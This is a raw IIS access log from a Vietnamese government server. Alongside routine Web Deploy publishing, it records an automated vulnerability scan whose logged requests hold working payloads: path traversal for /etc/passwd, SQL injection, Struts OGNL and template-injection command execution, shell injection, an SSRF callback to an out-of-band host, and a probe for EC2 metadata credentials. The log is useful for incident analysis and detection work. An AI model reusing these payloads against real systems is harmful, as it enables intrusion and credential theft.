2023-08-04 07:58:00 103.153.214.94 GET /index.php/admin/filemanager/sa/getZipFile path=/../../../../../../../etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 53
2023-08-04 08:06:48 103.153.214.94 GET /RestAPI/ImportTechnicians - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 70
2023-08-04 08:09:23 103.153.214.94 GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 48
2023-08-04 08:13:46 103.153.214.94 GET /latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance - 8172 - 111.90.143.37 - - 404 7 0 93
2023-08-04 08:18:15 103.153.214.94 POST /bsh.servlet.BshServlet - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 45
2023-08-04 08:25:40 103.153.214.94 GET /v1/submissions - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 48
2023-08-04 08:30:24 103.153.214.94 GET / qtproxycall=http://cj5gsq24749fn87ofdl0axtm7qr6w7yne.oast.site 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 59
2023-08-04 08:33:26 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 44
2023-08-04 08:34:14 103.153.214.94 POST /banker/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 57
2023-08-04 08:38:29 103.153.214.94 POST /zms/admin/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 https://bcvt.kontum.gov.vn:8172/zms/admin/index.php 404 7 0 62
2023-08-04 08:47:27 103.153.214.94 GET /index.php page=/etc/passwd%00 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 48
2023-08-04 08:52:02 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 119
2023-08-04 08:52:11 103.153.214.94 POST /app/options.py - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/app/login.py 404 7 0 51
2023-08-04 08:52:13 103.153.214.94 POST /checkValid - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 345
2023-08-04 08:52:22 103.153.214.94 GET /public/css/2TSGVwE9sSnfLZhUQdOBQBlLPMv.css - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 40
2023-08-04 08:54:49 103.153.214.94 POST /fileupload/toolsAny - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 59
2023-08-04 08:54:58 103.153.214.94 GET /authenticationendpoint/2tsgv8jd2uyncrl8mptjlyni1ia.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 41
2023-08-04 09:00:48 103.153.214.94 POST /index.php/management/set_timezone - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 https://bcvt.kontum.gov.vn:8172/index.php/management/datetime 404 7 0 48
2023-08-04 09:07:37 103.153.214.94 GET /index.action redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 59
2023-08-04 09:07:42 103.153.214.94 GET /upgrade_handle.php cmd=writeuploaddir&uploaddir=%27;whoami;%27 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 55
2023-08-04 09:07:45 103.153.214.94 GET /login.action redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 48
2023-08-04 09:07:53 103.153.214.94 GET /index.action redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 65
2023-08-04 09:08:01 103.153.214.94 GET /index.action action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 72
2023-08-04 09:08:08 103.153.214.94 GET /login.action action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 85
2023-08-04 09:08:15 103.153.214.94 GET /index.action action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 47
2023-08-04 09:08:21 103.153.214.94 GET /index.action redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 58
2023-08-04 09:08:27 103.153.214.94 GET /login.action redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 46
2023-08-04 09:08:33 103.153.214.94 GET /index.action redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 56
2023-08-04 09:13:08 103.153.214.94 POST /login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login.php 404 7 0 49
2023-08-04 09:15:28 103.153.214.94 POST /scrm/crm/admin - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 48
2023-08-04 09:25:02 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 - 171.231.147.222 - - 401 2 5 27
2023-08-04 09:25:02 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 39
2023-08-04 09:25:02 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 39
2023-08-04 09:25:02 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 VS17.0:PublishDialog:WTE17.4.326.54890;sid=c6b89535-d64c-4b0a-882e-258a904ca9b0;op=Sync - 200 0 0 244
2023-08-04 09:25:02 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 422
2023-08-04 09:25:02 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 28
2023-08-04 09:25:03 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 VS17.0:PublishDialog:WTE17.4.326.54890;sid=c6b89535-d64c-4b0a-882e-258a904ca9b0;op=Sync - 200 0 0 364
2023-08-04 09:25:03 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 494
2023-08-04 09:25:12 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 25
2023-08-04 09:25:12 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 29
2023-08-04 09:25:14 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 VS17.0:PublishDialog:WTE17.4.326.54890;sid=3de3d1da-1033-4750-97ef-f1628a681262;op=Sync - 200 0 0 1131
2023-08-04 09:25:14 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 1242
2023-08-04 09:25:14 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 26
2023-08-04 09:25:15 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 VS17.0:PublishDialog:WTE17.4.326.54890;sid=3de3d1da-1033-4750-97ef-f1628a681262;op=Sync - 200 0 0 1144
2023-08-04 09:25:15 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 1244
2023-08-04 09:26:33 103.153.214.94 GET /index.php ids[0,updatexml(0,concat(0xa,user()),0)]=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 46
2023-08-04 09:26:45 103.153.214.94 GET /webadmin/tools/unixlogin.php login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6c525452315a434e6e45775432567553335a76656a4a314e4441794f464e76626e4e5422207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/webadmin/admin/service_manager_data.php 404 7 0 70
2023-08-04 09:26:51 103.153.214.94 GET /webadmin/out - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn:8172/webadmin/admin/service_manager_data.php 404 7 0 112
2023-08-04 09:28:31 103.153.214.94 POST /classes/Login.php f=login 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 58
2023-08-04 09:37:30 103.153.214.94 GET /api/v2/cmdb/system/admin - 8172 - 111.90.143.37 Node.js - 404 7 0 159
2023-08-04 09:37:38 103.153.214.94 PUT /api/v2/cmdb/system/admin/admin - 8172 - 111.90.143.37 Report+Runner - 404 7 0 92
2023-08-04 09:38:27 103.153.214.94 POST /php/ping.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 83
2023-08-04 09:41:08 103.153.214.94 GET /services/getFile.cmd userfile=config.xml 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 113
2023-08-04 09:49:09 103.153.214.94 POST /cgi-bin/mainfunction.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 85
2023-08-04 09:49:56 103.153.214.94 GET /member/ajax_membergroup.php action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999999)+--+@`'` 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 66
2023-08-04 09:52:43 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 - 171.231.147.222 - - 401 2 5 25
2023-08-04 09:52:43 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 33
2023-08-04 09:52:43 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 36
2023-08-04 09:52:43 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 VS17.0:PublishDialog:WTE17.4.326.54890;sid=ff36a874-e879-4c97-8047-20f7b0a10a8c;op=Sync - 200 0 0 229
2023-08-04 09:52:43 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 392
2023-08-04 09:52:43 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 27
2023-08-04 09:52:43 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 VS17.0:PublishDialog:WTE17.4.326.54890;sid=ff36a874-e879-4c97-8047-20f7b0a10a8c;op=Sync - 200 0 0 215
2023-08-04 09:52:43 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 381
2023-08-04 09:52:49 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 82
2023-08-04 09:52:53 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 25
2023-08-04 09:52:53 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 32
2023-08-04 09:52:55 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 1058
2023-08-04 09:52:55 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 VS17.0:PublishDialog:WTE17.4.326.54890;sid=ac81b910-a57d-438b-b31a-8b1e488c52ba;op=Sync - 200 0 0 1012
2023-08-04 09:52:55 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 23
2023-08-04 09:52:56 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 1219
2023-08-04 09:52:56 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 VS17.0:PublishDialog:WTE17.4.326.54890;sid=ac81b910-a57d-438b-b31a-8b1e488c52ba;op=Sync - 200 0 0 1124
2023-08-04 10:00:20 103.153.214.94 POST /ui/login.action - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn:8172/ui/login.action 404 7 0 337
2023-08-04 10:02:21 103.153.214.94 GET /elfinder/php/connector.minimal.php cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 79
2023-08-04 10:04:21 103.153.214.94 GET /users/sign_in - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 57
2023-08-04 10:05:11 103.153.214.94 GET /plus/ajax_officebuilding.php act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 84
2023-08-04 10:16:14 103.153.214.94 GET /wp-admin/admin-ajax.php action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 85
2023-08-04 10:17:18 103.153.214.94 GET /dashboardUser - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 171
2023-08-04 10:18:30 103.153.214.94 POST /mgmt/shared/authn/login - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 77
2023-08-04 10:22:35 103.153.214.94 GET /mdiy/dict/listExcludeApp query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 88
2023-08-04 10:25:07 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 99
2023-08-04 10:29:39 103.153.214.94 POST /zentao/user-login.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn:8172/zentao/user-login.html 404 7 0 81
2023-08-04 10:30:06 103.153.214.94 GET /enginemanager/server/logs/download logType=error&logName=../../../../../../../../etc/passwd&logSource=engine 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 58
2023-08-04 10:35:17 103.153.214.94 GET /i3geo/exemplos/codemirror.php pagina=../../../../../../../../../../../../../../../../../etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 84
2023-08-04 10:38:56 103.153.214.94 GET /qvisdvr/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 89
2023-08-04 10:44:27 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 98
2023-08-04 10:45:02 103.153.214.94 GET / id=ww5fKg%25{128*128} 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 79
2023-08-04 10:47:15 103.153.214.94 GET /compliancepolicies.inc.php search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 57
2023-08-04 10:50:13 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 53
2023-08-04 10:55:48 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 61
2023-08-04 11:00:31 103.153.214.94 POST /javax.faces.resource/dynamiccontent.properties.xhtml - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 60
2023-08-04 11:00:59 103.153.214.94 GET /catalog-portal/ui/oauth/verify error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 57
2023-08-04 11:03:28 103.153.214.94 GET /blast/nph-viewgif.cgi ../../../../etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 61
2023-08-04 11:06:30 103.153.214.94 POST /OA_HTML/BneViewerXMLService bne:uueupload=TRUE 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 67
2023-08-04 11:06:39 103.153.214.94 GET /OA_CGI/FNDWRR.exe - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 66
